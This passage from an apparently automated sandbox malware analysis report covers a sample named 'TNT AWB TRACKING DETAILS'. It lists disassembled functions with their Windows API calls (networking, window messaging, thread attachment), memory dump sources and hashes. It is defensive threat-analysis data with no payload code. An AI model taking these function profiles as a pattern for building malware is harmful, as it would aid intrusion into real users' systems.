                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                      • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                                      • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: lstrcmpilstrcpylstrlen$_malloc
                                      • String ID: cdecl
                                      • API String ID: 3850814276-3896280584
                                      • Opcode ID: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
                                      • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                                      • Opcode Fuzzy Hash: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
                                      • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                                      Function 0046D402 Relevance: 6.1, APIs: 4, Instructions: 73networkCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                      • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
                                      • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                                      • _memmove.LIBCMT ref: 0046D475
                                      • inet_ntoa.WSOCK32(?), ref: 0046D481
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                                      • String ID:
                                      • API String ID: 2502553879-0
                                      • Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                      • Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
                                      • Opcode Fuzzy Hash: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                      • Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
                                      Function 00448C3C Relevance: 6.1, APIs: 4, Instructions: 72windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32 ref: 00448C69
                                      • GetWindowLongW.USER32(?,000000EC), ref: 00448C91
                                      • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                                      • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: MessageSend$LongWindow
                                      • String ID:
                                      • API String ID: 312131281-0
                                      • Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                      • Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
                                      • Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                      • Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
                                      Function 00458A61 Relevance: 6.1, APIs: 4, Instructions: 71networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                                      • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                                      • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                                      • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: ErrorLastacceptselect
                                      • String ID:
                                      • API String ID: 385091864-0
                                      • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                      • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                                      • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                      • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                                      Function 004368A0 Relevance: 6.1, APIs: 4, Instructions: 69windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID:
                                      • API String ID: 3850602802-0
                                      • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                      • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                                      • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                      • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                                      Function 004301F8 Relevance: 6.1, APIs: 4, Instructions: 57windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                                      • GetStockObject.GDI32(00000011), ref: 00430258
                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                                      • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Window$CreateMessageObjectSendShowStock
                                      • String ID:
                                      • API String ID: 1358664141-0
                                      • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                      • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                                      • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                      • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                                      Function 00443C87 Relevance: 6.1, APIs: 4, Instructions: 57synchronizationthreadwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                                      • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                                      • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                      • String ID:
                                      • API String ID: 2880819207-0
                                      • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                      • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                                      • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                      • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                                      Function 00430B87 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindowRect.USER32(?,?), ref: 00430BA2
                                      • ScreenToClient.USER32(?,?), ref: 00430BC1
                                      • ScreenToClient.USER32(?,?), ref: 00430BE2
                                      • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: ClientRectScreen$InvalidateWindow
                                      • String ID:
                                      • API String ID: 357397906-0
                                      • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                      • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                                      • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                      • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                                      Function 00433908 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                      Download Yara Rule
                                      APIs
                                      • __wsplitpath.LIBCMT ref: 0043392E
                                        • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                      • __wsplitpath.LIBCMT ref: 00433950
                                      • __wcsicoll.LIBCMT ref: 00433974
                                      • __wcsicoll.LIBCMT ref: 0043398A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                      • String ID:
                                      • API String ID: 1187119602-0
                                      • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                      • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                                      • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                      • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                                      Function 00434963 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _wcslen$_malloc_wcscat_wcscpy
                                      • String ID:
                                      • API String ID: 1597257046-0
                                      • Opcode ID: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                                      • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                                      • Opcode Fuzzy Hash: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                                      • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
                                      Function 0041F584 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                                      • __malloc_crt.LIBCMT ref: 0041F5B6
                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: EnvironmentStrings$Free__malloc_crt
                                      • String ID:
                                      • API String ID: 237123855-0
                                      • Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                      • Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
                                      • Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                      • Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
                                      Function 004556BE Relevance: 6.0, APIs: 4, Instructions: 40windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: DeleteDestroyObject$IconWindow
                                      • String ID:
                                      • API String ID: 3349847261-0
                                      • Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                      • Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
                                      • Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                      • Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
                                      Function 0044B5E8 Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                      Download Yara Rule
                                      APIs
                                      • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                                      • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                                      • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                                      • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                      • String ID:
                                      • API String ID: 2223660684-0
                                      • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                      • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
                                      • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                      • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
                                      Function 004472F1 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                        • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                        • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                        • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                        • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                      • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                                      • LineTo.GDI32(?,?,?), ref: 00447326
                                      • EndPath.GDI32(?), ref: 00447336
                                      • StrokePath.GDI32(?), ref: 00447344
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                      • String ID:
                                      • API String ID: 2783949968-0
                                      • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                      • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                                      • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                      • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                                      Function 0043646A Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                      • GetCurrentThreadId.KERNEL32 ref: 004364A3
                                      • AttachThreadInput.USER32(00000000), ref: 004364AA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                      • String ID:
